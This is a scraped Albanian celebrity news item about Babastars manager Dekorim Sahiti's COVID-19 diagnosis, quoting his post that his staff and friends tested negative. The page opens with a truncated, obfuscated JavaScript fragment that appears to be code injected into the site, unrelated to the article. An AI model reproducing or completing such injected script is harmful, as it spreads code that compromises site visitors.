;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Flet sërish menaxheri i “Babastars”: Si rezultuan rrethi i tij i kontakteve?

By

Pak ditë më parë u bë e ditur se Dekorim Sahiti, menaxheri i “Babastars” njëherësh edhe ndërmarrës në fushën e gastronomisë është diagnostifikuar me COVID-19.

Frika që pasoi ishte e madhe marrë shkas nga kontaktet e shumta që Dekorimi ka, për shkak të natyrës së punës së tij.

Mirëpo, fatmirësisht, Sahiti virusin nuk e ka transmetuar tek rrethi i tij i kontakteve, përfshirë edhe stafin e lokalit.

Këtë e ka treguar përmes një postimi në rrjete sociale, pas rezultateve të mostrave të marra ditët e fundit.

Reagimin e plotë të Dekorit e gjeni më poshtë. /Prive.al

Familjarë, shokë dhe shoqe …

Ditët që ballafaqohesh me virusin dhe je nën monotoninë e vetizolimit (sidomos në ditët me mot të mirë si këto të fundit), e vetmja gjë që të bën të lumtur është që të gjitha rastet e kontaktit tek të cilët ti mund të kesh qenë bartës i virusit po rezultojnë negativ në Covid-19.

Nuk jam ekspert i kësaj lëmie, por si duket virusit po i humb fuqia. Ballafaqimi me të po është më i lehtë dhe mundësia për të infektuar fatmirësisht është zvogluar. Gjithsesi, nuk po them që ta zvoglojmë kujdesin – përkundrazi.

Lajmi im i mirë është se deri më sot i gjithë stafi “Momo” si dhe miqtë me të cilët kam pasur më së shumti kontakt kanë rezultuar negativ 🙏🏼🙏🏼.

Shpresoj të vazhdoj kështu deri në fund dhe ne që po ballafaqohemi me këtë virus ta kalojmë sa më lehtë e t’i kthehemi normalitetit.

Ju don Dekori, shihemi së shpejti💪🏼

Kujdes po, panikë jo ♥️

Familjarë, shokë dhe shoqe … Ditët që ballafaqohesh me virusin dhe je nën monotoninë e vetizolimit (sidomos në ditët…

Gepostet von Dekorim Sahiti am Samstag, 20. Juni 2020

Artikuj të ngjashëm